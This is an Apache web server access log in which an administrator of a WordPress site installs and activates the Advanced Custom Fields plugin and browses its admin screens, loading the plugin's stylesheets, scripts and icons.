107.13.46.68 - - [01/Jul/2026:19:57:59 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 936 "http://drivebackmachine.net/wp-admin/plugin-install.php?s=Advanced%2520Custom%2520Fields&tab=search&type=term" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
::1 - - [01/Jul/2026:19:58:07 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
37.120.205.5 - - [01/Jul/2026:19:58:15 -0400] "POST /wp-cron.php?doing_wp_cron=1782950295.2801458835601806640625 HTTP/1.1" 200 259 "-" "WordPress/7.0; http://drivebackmachine.net"
107.13.46.68 - - [01/Jul/2026:19:58:15 -0400] "GET /wp-admin/plugins.php?_wpnonce=4e5111f40e&action=activate&plugin=advanced-custom-fields/acf.php HTTP/1.1" 302 576 "http://drivebackmachine.net/wp-admin/plugin-install.php?s=Advanced%2520Custom%2520Fields&tab=search&type=term" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:15 -0400] "GET /wp-admin/plugins.php?activate=true&plugin_status=all&paged=1&s= HTTP/1.1" 200 15912 "http://drivebackmachine.net/wp-admin/plugin-install.php?s=Advanced%2520Custom%2520Fields&tab=search&type=term" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:15 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf-escaped-html-notice.min.js?ver=6.8.5 HTTP/1.1" 200 568 "http://drivebackmachine.net/wp-admin/plugins.php?activate=true&plugin_status=all&paged=1&s=" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:15 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5 HTTP/1.1" 200 25649 "http://drivebackmachine.net/wp-admin/plugins.php?activate=true&plugin_status=all&paged=1&s=" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-admin/edit.php?post_type=acf-field-group HTTP/1.1" 200 15813 "http://drivebackmachine.net/wp-admin/plugins.php?plugin_status=all&paged=1&s" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/acf-logo.svg HTTP/1.1" 200 2916 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5 HTTP/1.1" 200 25649 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf.min.js?ver=6.8.5 HTTP/1.1" 200 19908 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/wp-engine-horizontal-black.svg HTTP/1.1" 200 12215 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/wp-engine-horizontal-white.svg HTTP/1.1" 200 12192 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/empty-group.svg HTTP/1.1" 200 13098 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/pro-chip.svg HTTP/1.1" 200 3783 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf-escaped-html-notice.min.js?ver=6.8.5 HTTP/1.1" 200 567 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-field-groups.svg HTTP/1.1" 200 2549 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-post-type.svg HTTP/1.1" 200 1549 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-taxonomies.svg HTTP/1.1" 200 1987 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-extended-menu.svg HTTP/1.1" 200 4828 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-add.svg HTTP/1.1" 200 471 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-chevron-down.svg HTTP/1.1" 200 470 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:20 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-stars.svg HTTP/1.1" 200 842 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/pro-upgrade-grid-bg.svg HTTP/1.1" 200 122866 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/pro-upgrade-overlay.svg HTTP/1.1" 200 1745 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-arrow-up-right.svg HTTP/1.1" 200 824 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-flexible-content.svg HTTP/1.1" 200 844 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-clone.svg HTTP/1.1" 200 983 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-repeater.svg HTTP/1.1" 200 2547 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-settings.svg HTTP/1.1" 200 2353 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-gallery.svg HTTP/1.1" 200 1026 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:21 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 652 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-admin/edit.php?post_type=acf-post-type HTTP/1.1" 200 15843 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-field-group" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/wp-engine-horizontal-black.svg HTTP/1.1" 304 249 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/acf-logo.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf.min.js?ver=6.8.5 HTTP/1.1" 200 19907 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5 HTTP/1.1" 200 25649 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/wp-engine-horizontal-white.svg HTTP/1.1" 304 249 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/empty-post-types.svg HTTP/1.1" 200 1819 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/pro-chip.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf-escaped-html-notice.min.js?ver=6.8.5 HTTP/1.1" 200 567 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-field-groups.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-post-type.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-taxonomies.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-extended-menu.svg HTTP/1.1" 304 249 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-stars.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-chevron-down.svg HTTP/1.1" 304 247 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-add.svg HTTP/1.1" 304 247 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/pro-upgrade-grid-bg.svg HTTP/1.1" 304 250 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/pro-upgrade-overlay.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-arrow-up-right.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-flexible-content.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-repeater.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-clone.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/icons/icon-settings.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/images/field-type-icons/icon-field-gallery.svg HTTP/1.1" 304 248 "http://drivebackmachine.net/wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:22 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 652 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-admin/post-new.php?post_type=acf-post-type HTTP/1.1" 200 45463 "http://drivebackmachine.net/wp-admin/edit.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/inc/datepicker/jquery-ui.min.css?ver=1.11.4 HTTP/1.1" 200 3987 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/inc/timepicker/jquery-ui-timepicker-addon.min.css?ver=1.6.1 HTTP/1.1" 200 904 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/inc/select2/4/select2.min.css?ver=4.0.13 HTTP/1.1" 200 2335 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/css/acf-input.min.css?ver=6.8.5 HTTP/1.1" 200 10585 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/css/acf-global.min.css?ver=6.8.5 HTTP/1.1" 200 25649 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5Bchunk_1%5D=,site-icon,l10n,wp-base-styles,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker&ver=7.0 HTTP/1.1" 200 119271 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/css/acf-field-group.min.css?ver=6.8.5 HTTP/1.1" 200 11434 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-includes/js/jquery/ui/resizable.min.js?ver=1.13.3 HTTP/1.1" 200 5698 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf-input.min.js?ver=6.8.5 HTTP/1.1" 200 34485 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=jquery-core,jquery-migrate,utils,wp-dom-ready,wp-hooks&ver=7.0 HTTP/1.1" 200 37283 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-includes/js/jquery/ui/datepicker.min.js?ver=1.13.3 HTTP/1.1" 200 11252 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/inc/timepicker/jquery-ui-timepicker-addon.min.js?ver=1.6.1 HTTP/1.1" 200 11000 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/build/js/acf.min.js?ver=6.8.5 HTTP/1.1" 200 19907 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:58:25 -0400] "GET /wp-content/plugins/advanced-custom-fields/assets/inc/select2/4/select2.full.min.js?ver=4.0.13 HTTP/1.1" 200 22133 "http://drivebackmachine.net/wp-admin/post-new.php?post_type=acf-post-type" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
